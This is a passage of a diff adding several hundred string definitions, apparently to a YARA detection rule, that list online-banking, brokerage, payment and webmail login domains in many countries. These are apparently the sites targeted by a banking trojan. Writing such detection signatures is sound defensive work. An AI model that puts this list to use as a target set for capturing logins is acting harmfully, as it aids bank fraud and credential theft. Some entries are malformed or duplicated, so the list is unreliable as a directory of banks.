+	$bank0078 = "express.53.com"
+	$bank0079 = "finanzportal.fiducia.de"
+	$bank007a = "global1.onlinebank.com"
+	$bank007b = "hbcibanking.apobank.de"
+	$bank007c = "hbnet.cedacri.it"
+	$bank007d = "home.cbonline.co.uk"
+	$bank007e = "homebank.nbg.gr"
+	$bank007f = "homebanking.cariparma.it"
+	$bank0080 = "ib.bigsky.net.au"
+	$bank0081 = "ib.national.com.au"
+	$bank0082 = "ibank.anbusiness.com"
+	$bank0083 = ".barclays.co.uk"
+	$bank0084 = "ibank.cahoot.com"
+	$bank0085 = "ibank.communityfirst.com.au"
+	$bank0086 = "inba.lukb.ch"
+	$bank0087 = "internet-banking.dbs.com.sg"
+	$bank0088 = "internetbanking.gad.de"
+	$bank0089 = "is2.cuviewpoint.net"
+	$bank008a = "lbbwebclient.lehmanbank.com"
+	$bank008b = "lo.lacaixa.es"
+	$bank008c = "mcw.airforcefcu.com"
+	$bank008d = "mfasa.chase.com"
+	$bank008e = "mijn.postbank.nl"
+	$bank0090 = "my.hypovereinsbank.de"
+	$bank0091 = "my.screenname.aol.com"
+	$bank0092 = "myonlineaccounts.abbeynational.co.uk"
+	$bank0093 = "net.kutxa.net"
+	$bank0094 = "oi.cajamadrid.es"
+	$bank0095 = "oie.cajamadridempresas.es"
+	$bank0096 = "okd5199.bcge.ch"
+	$bank0097 = "onba.zkb.ch"
+	$bank0098 = ".lloydstsb.co.uk"
+	$bank0099 = "online.bankofcyprus.com"
+	$bank009a = "online.bulbank.bg"
+	$bank009b = "online.citibank.com"
+	$bank009c = "online.mecu.com.au"
+	$bank009d = "online.sainsburysbank.co.uk"
+	$bank009e = "online.wamu.com"
+	$bank009f = ".wellsfargo.com"
+	$bank00a0 = "online.westpac.com.au"
+	$bank00a1 = "onlineaccess.ncsecu.org"
+	$bank00a3 = "onlinebanking.bankofoklahoma.com"
+	$bank00a4 = "onlinebanking.capitalone.com"
+	$bank00a5 = "onlinebanking.lasallebank.com"
+	$bank00a6 = "onlinebanking.nationalcity.com"
+	$bank00a7 = "onlineservices.amp.com.au"
+	$bank00a8 = "onlineservices.wachovia.com"
+	$bank00a9 = "onlineteller.cu.com.au"
+	$bank00aa = "paylinks.cunet.org"
+	$bank00ab = "portal.izb.de"
+	$bank00ac = "portal..de"
+	$bank00ad = "secure.accu.com.au"
+	$bank00ae = "secure.alpha.gr"
+	$bank00af = "secure.ampbanking.com"
+	$bank00b0 = ".lloydstsb.com"
+	$bank00b1 = "secure.esanda.com"
+	$bank00b2 = "secure.tcfexpress.com"
+	$bank00b3 = "seguro.cam.es"
+	$bank00b4 = "service.oneaccount.com"
+	$bank00b5 = "servizi.allianzbank.it"
+	$bank00b6 = "servizi.atime.it"
+	$bank00b7 = "signin.ebay.com"
+	$bank00b8 = "bankofamerica.com"
+	$bank00b9 = "sobanet.baloise.ch"
+	$bank00ba = "ssl2.haspa.de"
+	$bank00bb = "sso.uboc.com"
+	$bank00bc = "tb.raiffeisendirect.ch"
+	$bank00bd = "tcfexpressbusiness.com"
+	$bank00be = "telebanking.hbl.ch"
+	$bank00bf = "telemarch.bancamarch.es"
+	$bank00c0 = "treasury.wamu.com"
+	$bank00c1 = "trust.firsttennessee.com"
+	$bank00c2 = "vs.absa.co.za"
+	$bank00c3 = "wc.wachovia.com"
+	$bank00c4 = "web.da-us.citibank.com"
+	$bank00c5 = "webbanking.comerica.com"
+	$bank00c6 = "webcmpr.bancopopular.com"
+	$bank00c7 = ".co-operativebank.co.uk"
+	$bank00c8 = ".smile.co.uk"
+	$bank00c9 = ".440strand.com"
+	$bank00ca = ".bancopopular.es"
+	$bank00cb = ".fiibg.com"
+	$bank00cc = ".usbank.com"
+	$bank00cd = ".53.com"
+	$bank00ce = ".asia.citibank.com"
+	$bank00cf = ".bancatoscana.it"
+	$bank00d0 = ".banking.co.at"
+	$bank00d1 = ".halifax-online.co.uk"
+	$bank00d2 = ".bv-i.bancodevalencia.es"
+	$bank00d3 = ".caixacatalunya.es"
+	$bank00d4 = ".cajacanarias.es"
+	$bank00d5 = ".cbbusinessonline.com"
+	$bank00d6 = ".citibank.com.au"
+	$bank00d7 = ".citibank.com.my"
+	$bank00d8 = ".citibank.com.ph"
+	$bank00d9 = ".citibank.com.sg"
+	$bank00da = ".citibank.de"
+	$bank00db = ".citibankonline.ca"
+	$bank00dc = ".csebanking.it"
+	$bank00dd = ".ebank.us.hsbc.com"
+	$bank00de = ".etradeaustralia.com.au"
+	$bank00df = ".eurobank.gr"
+	$bank00e0 = ".fibanc.es"
+	$bank00e1 = ".firstib.com"
+	$bank00e2 = ".hellenicbank.com"
+	$bank00e3 = ".homebank.com.au"
+	$bank00e4 = ".in-bank.net"
+	$bank00e5 = ".inversis.com"
+	$bank00e6 = ".isideonline.it"
+	$bank00e7 = ".jpmorganinvest.com"
+	$bank00e8 = ".laiki.com"
+	$bank00e9 = ".linksimprese.sanpaoloimi.com"
+	$bank00ea = ".mybank.alliance-leicester.co.uk"
+	$bank00eb = ".mybusinessbank.co.uk"
+	$bank00ec = ".nextbanking.it"
+	$bank00ed = ".nwolb.com"
+	$bank00ee = ".ocfcu.org"
+	$bank00ef = ".onlinesefcu.com"
+	$bank00f0 = ".rbsdigital.com"
+	$bank00f1 = ".selectbenefit.com"
+	$bank00f2 = ".sharebuilder.com"
+	$bank00f3 = ".sparkasse.at"
+	$bank00f4 = ".ubs.com"
+	$bank00f5 = ".usaa.com"
+	$bank00f6 = ".winbank.gr"
+	$bank00f7 = ".maxisloans.com.au"
+	$bank00f8 = ".citizensbankonline.com"
+	$bank00f9 = ".site-secure.com"
+	$bank00fa = ".commbank.com.au"
+	$bank00fb = ".ameritrade.com"
+	$bank00fc = "swedbank.com"
+    $bank00fd = "hanza.net"
+    $bank00fe = "hansa.lt"
+    $bank00ff = "swedbankas.lt"
+    $bank0100 = "swedbank.net"
+    $bank0101 = "bbvapanama.com"
+    $bank0102 = "banconal.com.pa"
+    $bank0103 = "banconal.com"
+    $bank0104 = "banvivienda.net"
+    $bank0105 = "banvivienda.com"
+    $bank0106 = "bancouno.com.pa"
+    $bank0107 = "bancouno.com"
+    $bank0108 = "credicorpbank.com"
+    $bank0109 = "globalbank.com.pa"
+    $bank010a = "globalbank.com"
+    $bank010b = "swedbank.lt"
+    $bank010c = "hsbc.com.pa"
+    $bank010d = "multibank.com"
+    $bank010e = "credicorpbank.com"
+    $bank010f = "multibank.com.pa"
+    $bank0110 = "bbvapanama.com"
+    $bank0111 = "banconal.com.pa"
+    $bank0112 = "banvivienda.net"
+    $bank0113 = "banvivienda.com"
+    $bank0114 = "globalbank.com.pa"
+    $bank0115 = "globalbank.com"
+    $bank0116 = "bancouno.com.pa"
+    $bank0117 = "bancouno.com"
+    $bank0118 = "banconal.com"
+    $bank0119 = "bancopanama.com.pa"
+    $bank011a = "bancopanama.com"
+    $bank011b = "parex.lt"
+    $bank011c = "kiwibank.co.nz"
+    $bank011d = "kiwibank.com"
+    $bank011e = "seb.lt"
+    $bank011f = "kfh.com"
+    $bank0120 = "kfh.com.kw"
+    $bank0121 = "boq.com"
+    $bank0122 = "boq.com.au"
+    $bank0123 = "bankofqueensland.com"
+    $bank0124 = "asb.co.nz"
+    $bank0125 = "asb.com"
+    $bank0126 = "tsb.co.nz"
+    $bank0127 = "tsb.com"
+    $bank0128 = "cahoot.com"
+    $bank0129 = "cahoot.co.uk"
+    $bank012a = ".ameriprise.com"
+    $bank012b = ".ebay.com"
+    $bank012c = ".e-gold.com"
+    $bank012d = ".tdcanadatrust.com"
+    $bank012e = ".banesto.es"
+    $bank012f = ".gruposantander.es"
+    $bank0130 = ".bancajaproximaempresas.com"
+    $bank0131 = ".procreditbank.bg"
+    $bank0132 = ".barclays.com"
+    $bank0133 = ".dab-bank.com"
+    $bank0134 = ".hsbc.co.uk"
+    $bank0135 = ".ybonline.co.uk"
+    $bank0136 = ".bancoherrero.com"
+    $bank0137 = ".bancopastor.es"
+    $bank0138 = ".cajamurcia.es"
+    $bank0139 = ".caja-granada.es"
+    $bank013a = ".fibancmediolanum.es"
+    $bank013b = ".cajarioja.es"
+    $bank013c = ".cajasoldirecto.es"
+    $bank013d = ".caixalaietana.es"
+    $bank013e = "areasegura.banif.es"
+    $bank013f = ".bgnetplus.com"
+    $bank0140 = ".caixagirona.es"
+    $bank0141 = ".unicaja.es"
+    $bank0142 = ".sabadellatlantico.com"
+    $bank0143 = ".cajabadajoz.es"
+    $bank0144 = ".banesto.es"
+    $bank0145 = ".elmonte.es"
+    $bank0146 = ".cajamadridempresas.es"
+    $bank0147 = ".gruppocarige.it"
+    $bank0148 = "bancopostaonline.poste.it"
+    $bank0149 = ".internetbanking.bancaintesa.it"
+    $bank014a = "hb.quiubi.it"
+    $bank014b = ".iwbank.it"
+    $bank014c = "web.secservizi.it"
+    $bank014d = "scrigno.popso.it"
+    $bank014e = "light.webmoney.ru"
+    $bank014f = ".nationet.com"
+    $bank0150 = ".banking.first-direct.com"
+    $bank0151 = "cardsonline-consumer.com"
+    $bank0152 = "internetbanking.aib.ie"
+    $bank0153 = "lot-port.bcs.ru"
+    $bank0154 = "rupay.com"
+    $bank0155 = "ingbank.pl" nocase
+    $bank0156 = "millenet.pl" nocase
+    $bank0157 = "bph.pl" nocase
+    $bank0158 = "centrum24.pl" nocase
+    $bank0159 = "nationwide.co.uk" nocase
+    $bank015a = "mbank.pl" nocase
+    $bank015b = "mbank.com.pl" nocase
+    $bank015c = "deutsche-bank.de" nocase
+    $bank015d = "bankingportal.kreissparkasse-heilbronn.de" nocase
+    $bank015e = "bankingportal.sparkasse-meschede.de" nocase
+    $bank015f = "bankingportal.swn-online.de" nocase
+    $bank0160 = "bankingportal.sparkasse-aachen.de" nocase
+    $bank0161 = "natwest" nocase
+    $bank0166 = "e-bullion" nocase
+    $bank0167 = "login.hsbc.com" nocase
+    $bank0168 = "gemoney" nocase
+    $bank0169 = "webid2.gs.com" nocase
+    $bank016a = "myworld.insinger.com" nocase
+    $bank016b = "my.if.com" nocase
+    $bank016c = "leedscitycreditunion.co.uk" nocase
+    $bank016d = "libbackoffice.com" nocase
+    $bank016e = "clearstream.com" nocase
+    $bank016f = "financepilot-trans.mlp.de" nocase
+    $bank0170 = "fidelity.co.uk" nocase
+    $bank0171 = "selftrade.co.uk" nocase
+    $bank0172 = "standardlife.com" nocase
+    $bank0173 = "https://www.rbsdigital.com/default.aspx" nocase
+    $bank0174 = "https://www.hsbc.co.uk/" nocase
+    $bank0175 = "login.live.com" nocase
+    $bank0176 = "google.com/accounts/servicelogin" nocase
+    $bank0177 = "yahoo.com/config" nocase
+    $bank0178 = ".idsonline.com" nocase
+    $bank0179 = ".ctn.independent.co.za" nocase
+    $bank017a = ".electric.co.za" nocase
+    $bank017b = ".rmb.co.za" nocase
+    $bank017c = ".great-china.net" nocase
+    $bank017d = ".hangseng.com" nocase
+    $bank017e = ".hsbcgroup.com" nocase
+    $bank017f = ".iba.com.hk" nocase
+    $bank0180 = ".bdni.com" nocase
+    $bank0181 = ".bii.co.id" nocase
+    $bank0182 = ".servitia.com" nocase
+    $bank0183 = ".indoweb.com" nocase
+    $bank0184 = ".sphere.ad.jp" nocase
+    $bank0185 = ".infoweb.or.jp" nocase
+    $bank0186 = ".ltcb.co.jp" nocase
+    $bank0187 = ".csweb.co.jp" nocase
+    $bank0188 = ".ahli.com" nocase
+    $bank0189 = ".iworld.net" nocase
+    $bank018a = ".cbk.co.kr" nocase
+    $bank018b = ".wisedb.co.kr" nocase
+    $bank018c = ".cybernet.co.kr" nocase
+    $bank018d = ".dacom.co.kr" nocase
+    $bank018e = ".kol.co.kr" nocase
+    $bank018f = ".kfb.co.kr" nocase
+    $bank0190 = ".nacf.co.kr" nocase
+    $bank0191 = ".saradar.com.lb" nocase
+    $bank0192 = ".bnm.gov.my" nocase
+    $bank0193 = ".jaring.my" nocase
+    $bank0194 = ".bpi.com.ph" nocase
+    $bank0195 = ".pcib.com" nocase
+    $bank0196 = ".anb.com.sa" nocase
+    $bank0197 = ".isdb.org" nocase
+    $bank0198 = ".citicorp.com" nocase
+    $bank0199 = ".technet.sg" nocase
+    $bank019a = ".chinatrust.com.tw" nocase
+    $bank019b = ".bot.or.th" nocase
+    $bank019c = ".ntb.co.th" nocase
+    $bank019d = ".scb.co.th" nocase
+    $bank019e = ".creditandorra.ad" nocase
+    $bank019f = ".bawag.com" nocase
+    $bank01a0 = ".hypo-alpe-adria.com" nocase
+    $bank01a1 = ".kaerntnersparkasse.co.at" nocase
+    $bank01a2 = ".hypotirol.at" nocase
+    $bank01a3 = ".oenb.co.at" nocase
+    $bank01a4 = ".psk.co.at" nocase
+    $bank01a5 = ".wpf.at" nocase
+    $bank01a6 = ".geocitdies.com" nocase
+    $bank01a7 = ".stmk.raiffeisen.at" nocase
+    $bank01a8 = ".bkkallincl.co.at" nocase
+    $bank01a9 = ".rbs.co.at" nocase
+    $bank01aa = ".rlb-tirol.at" nocase
+    $bank01ab = ".raiffeisen.at" nocase
+    $bank01ac = ".sparkasseleoben.at" nocase
+    $bank01ad = ".smw.at" nocase
+    $bank01ae = ".sparkasse-weiz.at" nocase
+    $bank01af = ".weinviertler-spk.at" nocase
+    $bank01b0 = ".bbl.be" nocase
+    $bank01b1 = ".cger.be" nocase
+    $bank01b2 = ".cbe.be" nocase
+    $bank01b3 = ".banque-cortal.fr" nocase
+    $bank01b4 = ".fortis.com" nocase
+    $bank01b5 = ".iccs.acad.bg" nocase
+    $bank01b6 = ".rzb.co.at" nocase
+    $bank01b7 = ".centraleurope.com" nocase
+    $bank01b8 = ".vol.cz" nocase
+    $bank01b9 = ".koba.cz" nocase
+    $bank01ba = ".union.cz" nocase
+    $bank01bb = ".rzb.co.at" nocase
+    $bank01bc = ".addgr.com" nocase
+    $bank01bd = ".open.hr" nocase
+    $bank01be = ".kaptol.hr" nocase
+    $bank01bf = ".pbz.hr" nocase
+    $bank01c0 = ".rzb.co.at" nocase
+    $bank01c1 = ".enterprise.net" nocase
+    $bank01c2 = ".ebs.ie" nocase
+    $bank01c3 = ".sda.dk" nocase
+    $bank01c4 = ".eyp.ee" nocase
+    $bank01c5 = ".depo.ee" nocase
+    $bank01c6 = ".forex.ee" nocase
+    $bank01c7 = ".aktia.fi" nocase
+    $bank01c8 = ".fuib.com" nocase
+    $bank01c9 = ".ucb.crimea.ua" nocase
+    $bank01ca = ".tcmb.gov.tr" nocase
+    $bank01cb = ".osmanli.com.tr" nocase
+    $bank01cc = ".falkenbergs-sparb.se" nocase
+    $bank01cd = ".stadshypotek.se" nocase
+    $bank01ce = ".abnamro.se" nocase
+    $bank01cf = ".sb-koper.si" nocase
+    $bank01d0 = ".bsi.si" nocase
+    $bank01d1 = ".basl.sk" nocase
+    $bank01d2 = ".slsp.sk" nocase
+    $bank01d3 = ".rzb.co.at" nocase
+    $bank01d4 = ".bancpost.ro" nocase
+    $bank01d5 = ".kappa.ro" nocase
+    $bank01d6 = ".bdk.lublin.pl" nocase
+    $bank01d7 = ".pbks.pl" nocase
+    $bank01d8 = ".ben.com.pl" nocase
+    $bank01d9 = ".bswek.comew.pl" nocase
+    $bank01da = ".pbks.pl" nocase
+    $bank01db = ".cyf-kr.edu.pl" nocase
+    $bank01dc = ".oslonett.no" nocase
+    $bank01dd = ".sn.no" nocase
+    $bank01de = ".kreditkassen.no" nocase
+    $bank01df = ".novit.no" nocase
+    $bank01e0 = ".novit.no" nocase
+    $bank01e1 = ".novit.no" nocase
+    $bank01e2 = ".smn.no" nocase
+    $bank01e3 = ".novit.no" nocase
+    $bank01e4 = ".novit.no" nocase
+    $bank01e5 = ".megabyte.net" nocase
+    $bank01e6 = ".bcee.lu" nocase
+    $bank01e7 = ".creditlyonnais.lu" nocase
+    $bank01e8 = ".innet.net" nocase
+    $bank01e9 = ".kbl.lu" nocase
+    $bank01ea = ".bil.lu" nocase
+    $bank01eb = ".banqueucl.lu" nocase
+    $bank01ec = ".swconsult.ch" nocase
+    $bank01ed = ".llb.li" nocase
+    $bank01ee = ".lanet.lv" nocase
+    $bank01ef = ".rbu.vernet.lv" nocase
+    $bank01f0 = ".lain.bkc.lv" nocase
+    $bank01f1 = ".parexnet.lv" nocase
+    $bank01f2 = ".tkb.lv" nocase
+    $bank01f3 = ".dlb.bkc.lv" nocase
+    $bank01f4 = ".mkb.hu" nocase
+    $bank01f5 = ".tke.gr" nocase
+    $bank01f6 = ".etba.gr" nocase
+    $bank01f7 = ".kapatel.gr" nocase
+    $bank01f8 = ".tinet.ch" nocase
+    $bank01f9 = ".tinet.ch" nocase
+    $bank01fa = ".juliusbaer.com" nocase
+    $bank01fb = ".vontobel.ch" nocase
+    $bank01fc = ".bcf.ch" nocase
+    $bank01fd = ".bgl.ch" nocase
+    $bank01fe = ".hottinger.com" nocase
+    $bank01ff = ".cogeba.ch" nocase
+    $bank0200 = ".mbczh.ch" nocase
+    $bank0201 = ".swconsult.ch" nocase
+    $bank0202 = ".ska.com" nocase
+    $bank0203 = ".tgkb.ch" nocase
+    $bank0204 = ".urkb.ch" nocase
+    $bank0205 = ".zhkb.ch" nocase
+    $bank0206 = ".bnu.pt" nocase
+    $bank0207 = ".bpatlantico.pt" nocase
+    $bank0208 = ".bcf.pt" nocase
+    $bank0209 = ".bes.pt" nocase
+    $bank020a = ".banif.pt" nocase
+    $bank020b = ".barclays.pt" nocase
+    $bank020c = ".cgd.pt" nocase
+    $bank020d = ".cisf.pt" nocase
+    $bank020e = ".mayo-ireland.ie" nocase
+    $bank020f = ".webnet.ie" nocase
+    $bank0210 = ".365online.com" nocase
+    $bank0211 = ".ebs.ie" nocase
+    $bank0212 = ".bga.it" nocase
+    $bank0213 = ".carige.it" nocase
+    $bank0214 = ".bci.it" nocase
+    $bank0215 = ".bcoopimola.it" nocase
+    $bank0216 = ".lavalsabbina.it" nocase
+    $bank0217 = ".bcc.it" nocase
+    $bank0218 = ".bcccst.it" nocase
+    $bank0219 = ".val.it" nocase
+    $bank021a = ".bcc.cremonese.it" nocase
+    $bank021b = ".ets.it" nocase
+    $bank021c = ".net1.it" nocase
+    $bank021d = ".agrobresciano.it" nocase
+    $bank021e = ".bccbarlassina.com" nocase
+    $bank021f = ".bcc.it" nocase
+    $bank0220 = ".bcc.carugate.mi.it" nocase
+    $bank0221 = ".diel.it" nocase
+    $bank0222 = ".bccgarda.numerica.it" nocase
+    $bank0223 = ".romagna.com" nocase
+    $bank0224 = ".bccfiuggi.it" nocase
+    $bank0225 = ".bcc.it" nocase
+    $bank0226 = ".bccsgv.it" nocase
+    $bank0227 = ".media.it" nocase
+    $bank0228 = ".bccsanteramo.it" nocase
+    $bank0229 = ".bcctriuggio.it" nocase
+    $bank022a = ".bccvdc.it" nocase
+    $bank022b = ".bccfc.it" nocase
+    $bank022c = ".bga.it" nocase
+    $bank022d = ".biemmepro.it" nocase
+    $bank022e = ".bnl.it" nocase
+    $bank022f = ".bpam.it" nocase
+    $bank0230 = ".bpci.it" nocase
+    $bank0231 = ".bpf.it" nocase
+    $bank0232 = ".bplazio.it" nocase
+    $bank0233 = ".popvoba.it" nocase
+    $bank0234 = ".bpa.it" nocase
+    $bank0235 = ".bpb.it" nocase
+    $bank0236 = ".meda.it" nocase
+    $bank0237 = ".poplodi.it" nocase
+    $bank0238 = ".bpm.it" nocase
+    $bank0239 = ".bpn.it" nocase
+    $bank023a = ".bpb.it" nocase
+    $bank023b = ".bpv.it" nocase
+    $bank023c = ".xnet.it" nocase
+    $bank023d = ".popvi.it" nocase
+    $bank023e = ".bpci.it" nocase
+    $bank023f = ".bsp.it" nocase
+    $bank0240 = ".ambro.it" nocase
+    $bank0241 = ".bancodisicilia.it" nocase
+    $bank0242 = ".cariverona.it" nocase
+    $bank0243 = ".crtn.it" nocase
+    $bank0244 = ".caribusiness.it" nocase
+    $bank0245 = ".sgol.it" nocase
+    $bank0246 = ".crcarpi.it" nocase
+    $bank0247 = ".romagna.com" nocase
+    $bank0248 = ".caricast.it" nocase
+    $bank0249 = ".paginegialle.it" nocase
+    $bank024a = ".crimola.it" nocase
+    $bank024b = ".arcanet.it" nocase
+    $bank024c = ".cariprpc.pr.it" nocase
+    $bank024d = ".caripisa.it" nocase
+    $bank024e = ".iper.net" nocase
+    $bank024f = ".omniway.sm" nocase
+    $bank0250 = ".carisa.it" nocase
+    $bank0251 = ".carispe.it" nocase
+    $bank0252 = ".start.it" nocase
+    $bank0253 = ".cassalombarda.it" nocase
+    $bank0254 = ".cracantu.it" nocase
+    $bank0255 = ".cracastelgoffredo.it" nocase
+    $bank0256 = ".crbvfbcc.it" nocase
+    $bank0257 = ".sunrise.it" nocase
+    $bank0258 = ".well.it" nocase
+    $bank0259 = ".delta.it" nocase
+    $bank025a = ".ruralerovereto.it" nocase
+    $bank025b = ".crsbc.it" nocase
+    $bank025c = ".cassamarca.it" nocase
+    $bank025d = ".creberg.it" nocase
+    $bank025e = ".credit.it" nocase
+    $bank025f = ".bnl.it" nocase
+    $bank0260 = ".bcc.it" nocase
+    $bank0261 = ".ipacri.it" nocase
+    $bank0262 = ".mbres.it" nocase
+    $bank0263 = ".mediocredito.fvg.it" nocase
+    $bank0264 = ".medioumbria.it" nocase
+    $bank0265 = ".mfc.it" nocase
+    $bank0266 = ".mediolanum.it" nocase
+    $bank0267 = ".nbctkb.it" nocase
+    $bank0268 = ".1822direkt.com" nocase
+    $bank0269 = ".adig.de" nocase
+    $bank026a = ".americanexpress.de" nocase
+    $bank026b = ".maffei.de" nocase
+    $bank026c = ".bkm.de" nocase
+    $bank026d = ".schwaebisch-hall.de" nocase
+    $bank026e = ".bbs-sachsen.de" nocase
+    $bank026f = ".comdirect.de" nocase
+    $bank0270 = ".dbresearch.com" nocase
+    $bank0271 = ".dit.de" nocase
+    $bank0272 = "pekao24.pl" nocase
+    $bank0273 = ".gallinat.de" nocase
+    $bank0274 = ".heimstatt.de" nocase
+    $bank0275 = ".essenhyp.de" nocase
+    $bank0276 = ".lrp.de" nocase
+    $bank0277 = ".lbs-hamburg.de" nocase
+    $bank0278 = ".lbs-wuertt.de" nocase
+    $bank0279 = ".leonberger.de" nocase
+    $bank027a = ".lhb.de" nocase
+    $bank027b = ".nordlb.de" nocase
+    $bank027c = ".olb.de" nocase
+    $bank027d = ".raiba-beilngries.de" nocase
+    $bank027e = ".dresdner-rb.kontodirekt.de" nocase
+    $bank027f = ".rberding.de" nocase
+    $bank0280 = ".rb-eschlkam-neukirchen.de" nocase
+    $bank0281 = ".raiba-fluorn-winzeln.rwg.de" nocase
+    $bank0282 = ".rb-frankenhardt-stimpfach.de" nocase
+    $bank0283 = ".rbgarrel.de" nocase
+    $bank0284 = ".rb-graefo.de" nocase
+    $bank0285 = ".rbk-haag-gars.de" nocase
+    $bank0286 = ".raiba-haibach.de" nocase
+    $bank0287 = ".raiba-hoes.de" nocase
+    $bank0288 = ".raiba-ichenhausen.de" nocase
+    $bank0289 = ".direktpro.com" nocase
+    $bank028a = ".rb-ismaning.de" nocase
+    $bank028b = ".rb-kimi.de" nocase
+    $bank028c = ".raiba-moembris.de" nocase
+    $bank028d = ".raiba-neuler.rwg.de" nocase
+    $bank028e = ".rb-nordspessart-freigericht.de" nocase
+    $bank028f = ".raibaschleissheim.de" nocase
+    $bank0290 = ".vb-rb-passau-freyung.de" nocase
+    $bank0291 = ".rottaler-raiba.de" nocase
+    $bank0292 = ".raiba-regenstauf.de" nocase
+    $bank0293 = ".vb-rb-riedlingen.de" nocase
+    $bank0294 = ".raiba-sob.de" nocase
+    $bank0295 = ".raiba-voba.de" nocase
+    $bank0296 = ".rvb-varel-zetel.de" nocase
+    $bank0297 = ".sachsenlb.de" nocase
+    $bank0298 = ".santander.de" nocase
+    $bank0299 = ".socgen.de" nocase
+    $bank029a = ".sparda-hh.de" nocase
+    $bank029b = ".deka.de" nocase
+    $bank029c = ".ksk-alzey.de" nocase
+    $bank029d = ".ksk-bernkastel-wittlich.de" nocase
+    $bank029e = ".kskcalw.de" nocase
+    $bank029f = ".kskcochem-zell.de" nocase
+    $bank02a0 = ".sparkasse-ebersberg.de" nocase
+    $bank02a1 = ".es.ksk.de" nocase
+    $bank02a2 = ".kreissparkasse-heinsberg.de" nocase
+    $bank02a3 = ".ksk-koeln.de" nocase
+    $bank02a4 = ".kskkusel.de" nocase
+    $bank02a5 = ".sparkasse-lichtenfels.de" nocase
+    $bank02a6 = ".snet.de" nocase
+    $bank02a7 = ".ksk-stade.de" nocase
+    $bank02a8 = ".ksk-tuebingen.de" nocase
+    $bank02a9 = ".lzo.com" nocase
+    $bank02aa = ".osgv.de" nocase
+    $bank02ab = ".sparkasse-bad-hersfeld-rotenburg.de" nocase
+    $bank02ac = ".sparkasse-radevormwald.de" nocase
+    $bank02ad = ".sparkasse-ravensburg.de" nocase
+    $bank02ae = ".sparkasse.net" nocase
+    $bank02af = ".sparkasse-werra-meissner.de" nocase
+    $bank02b0 = ".stadtsparkasse-aichach.de" nocase
+    $bank02b1 = ".sskba.de" nocase
+    $bank02b2 = "sskduesseldorf.de" nocase
+    $bank02b3 = ".sparkasse-magdeburg.de" nocase
+    $bank02b4 = ".stadtsparkasse-nuernberg.de" nocase
+    $bank02b5 = ".stadtsparkasse-remscheid.de" nocase
+    $bank02b6 = ".suedboden.de" nocase
+    $bank02b7 = ".vbk-du.de" nocase
+    $bank02b8 = ".vb-badfriedrichshall.de" nocase
+    $bank02b9 = ".voba-bensheim.de" nocase
+    $bank02ba = ".voba-bes-boe.de" nocase
+    $bank02bb = ".bischofsheimer-vb.de" nocase
+    $bank02bc = ".vb-bocholt.de" nocase
+    $bank02bd = ".borkenervb.de" nocase
+    $bank02be = ".voba-brv.de" nocase
+    $bank02bf = ".vb-brilon.de" nocase
+    $bank02c0 = "b-bruchsal.de" nocase
+    $bank02c1 = ".vb-ammerland.de" nocase
+    $bank02c2 = ".vb-eppingen.de" nocase
+    $bank02c3 = ".cymagic.com" nocase
+    $bank02c4 = ".mmedia-ge.de" nocase
+    $bank02c5 = ".genoba-meckenbeuren.rwg.de" nocase
+    $bank02c6 = ".vb-greven.de" nocase
+    $bank02c7 = ".voba-gg.de" nocase
+    $bank02c8 = ".vb-hamm.de" nocase
+    $bank02c9 = ".vbhan.de" nocase
+    $bank02ca = ".heidenheimer-voba.de" nocase
+    $bank02cb = ".vbu.wgv.de" nocase
+    $bank02cc = ".vbketsch.de" nocase
+    $bank02cd = ".vb-lahr.de" nocase
+    $bank02ce = ".vblehrte.genonord.de" nocase
+    $bank02cf = ".voba-main-taunus.de" nocase
+    $bank02d0 = ".voba-ober-moerlen.de" nocase
+    $bank02d1 = ".vb-reutlingen.de" nocase
+    $bank02d2 = ".vb-rheda-wd.de" nocase
+    $bank02d3 = ".vb-rhein-wupper.de" nocase
+    $bank02d4 = ".vbsauerland.de" nocase
+    $bank02d5 = ".vb-spiesen-elversberg.de" nocase
+    $bank02d6 = ".vbstadthagen.genonord.de" nocase
+    $bank02d7 = ".hellwegeranzeiger.de" nocase
+    $bank02d8 = ".vilstal.net" nocase
+    $bank02d9 = ".wb-aktuell.com" nocase
+    $bank02da = ".vb-wolfratshausen.de" nocase
+    $bank02db = ".bristol-west.co.uk" nocase
+    $bank02dc = ".cheltglos.co.uk" nocase
+    $bank02dd = ".ebrd.com" nocase
+    $bank02de = ".ftbni.com" nocase
+    $bank02df = ".hdb.co.uk" nocase
+    $bank02e0 = ".hsbcib.com" nocase
+    $bank02e1 = ".hsbcgroup.com" nocase
+    $bank02e2 = ".mhbs.co.uk" nocase
+    $bank02e3 = ".natdsionwidde.co.auk" nocase
+    $bank02e4 = ".natwest.co.uk" nocase
+    $bank02e5 = ".rbos.co.uk" nocase
+    $bank02e6 = ".sbil.co.uk" nocase
+    $bank02e7 = ".careermosaic.com" nocase
+    $bank02e8 = "kb24.pl" nocase
+    $bank02e9 = ".abnamro.nl" nocase
+    $bank02ea = ".bng.nl" nocase
+    $bank02eb = ".friba.nl" nocase
+    $bank02ec = ".vanlanschot.nl" nocase
+    $bank02ed = ".veronica.nl" nocase
+    $bank02ee = ".limbu.nl" nocase
+    $bank02ef = ".bmo.com" nocase
+    $bank02f0 = ".desjardins.com" nocase
+    $bank02f1 = ".canadatrust.com" nocase
+    $bank02f2 = ".citizenstrust.ca" nocase
+    $bank02f3 = ".coopcb.com" nocase
+    $bank02f4 = ".cdb.com.cy" nocase
+    $bank02f5 = ".fbme.com" nocase
+    $bank02f6 = ".sgcyprus.com" nocase
+    $bank02f7 = ".frostbank.com" nocase
+    $bank02f8 = ".mibank.com" nocase
+    $bank02f9 = ".floridagulfbank.com" nocase
+    $bank02fa = ".ebanking-services.com" nocase
+    $bank02fb = "commerceonlinebanking.com" nocase
+    $bank02fc = ".warwickcreditunion.com.au" nocase
+    $bank02fd = ".qccu.com.au" nocase
+    $bank02fe = "ib.boq.com.au" nocase
+    $bank02ff = "secure.ampbanking.com" nocase
+    $bank0300 = "internetbanking.suncorpmetway.com.au" nocase
+    $bank0301 = "online.hbs.net.au" nocase
+    $bank0302 = "online.mecu.com.au" nocase
+    $bank0303 = "amp.com.au" nocase
+    $bank0304 = ".tsw.com.au" nocase
+    $bank0306 = ".rbsdigital.com" nocase
+    $bank0307 = ".netspend.com" nocase
+    $bank0308 = ".365online.co.uk" nocase
+    $bank0309 = "ibanking.banksa.com.au" nocase
+    $bank030b = "ibanking.stgeorge.com.au" nocase
+    $bank030c = "westpac.com.au" nocase
+    $bank030d = "probanking.procreditbank.bg" nocase
+    $bank030e = ".citibank.de" nocase
+    $bank030f = "arquia.es" nocase
+    $bank0310 = ".uno-e.com" nocase
+    $bank0311 = "privati.internetbanking.bancaintesa.it" nocase
+    $bank0312 = ".gbw2.it" nocase
